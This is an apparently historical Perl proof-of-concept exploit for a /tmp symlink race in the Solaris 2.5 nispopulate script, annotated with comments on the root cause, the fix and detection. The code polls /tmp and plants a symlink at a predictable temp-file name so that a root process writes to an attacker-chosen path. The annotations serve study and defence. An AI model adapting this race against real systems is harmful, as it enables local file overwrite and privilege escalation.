#!/opt/gnu/bin/perl

# nisplus-exploit.pl
#
# to test: 1) start the script   2) as root, run /usr/lib/nispopulate
# Demonstrates a weakness in the Solaris 2.5 /usr/lib/nis/nispopulate
# shell script by planting a symlink whose name ends in a pid.
#
#                                     - runeb@td.org.uit.no

# Path the planted symlink points at. symlink() below is called as
# symlink(TARGET, LINKNAME), so anything that later writes through the link
# without checking it ends up at this path. The name is a file in the
# filesystem root; presumably chosen because only root can create it there,
# which makes a successful write visible -- confirm against the advisory.
$destfile = "/hello.world";

# Poll /tmp once per second until a directory entry whose name starts with
# "sh" appears, then plant one symlink and stop.
#
# NOTE(review): the root cause is on the nispopulate side, which is not shown
# here. Per the header comment, it uses a /tmp/passwd_<pid> name that any
# local user can predict and pre-create. The usual fix class is to create
# temporary files in a private, root-owned directory (or with an
# unpredictable name and exclusive creation) and never to write through a
# pre-existing symlink in a world-writable directory.
#
# Detection: the artifact left behind is a symlink named /tmp/passwd_* that
# resolves to a path outside /tmp.
do {
    # Return value is not checked; if /tmp cannot be opened, readdir returns
    # nothing and the outer loop simply sleeps and retries.
    opendir(TMP, "/tmp");
    # Plain truthiness test on the entry name (no defined() check).
    while ($f = readdir(TMP)) {
        # Match entries named "sh..."; presumably the shell's own temporary
        # file, whose name embeds the pid -- TODO confirm.
        if (substr($f, 0, 2) eq "sh") {
            # The link name is "/tmp/passwd_" plus the entry name with its
            # first two characters ("sh") and its final character removed.
            # The result of symlink() is not checked, so an existing file of
            # that name makes this a silent no-op.
            symlink($destfile, "/tmp/passwd_" . substr($f,2,length($f)-3));
            # Only the first matching entry is used; `last` leaves the
            # readdir loop and $quit ends the outer polling loop.
            $quit=1; last;
        }
    }
    closedir(TMP);
    sleep(1);
# $quit is never initialised; undef compares numerically equal to 0, so the
# loop keeps polling until the branch above sets it to 1.
} while $quit == 0;
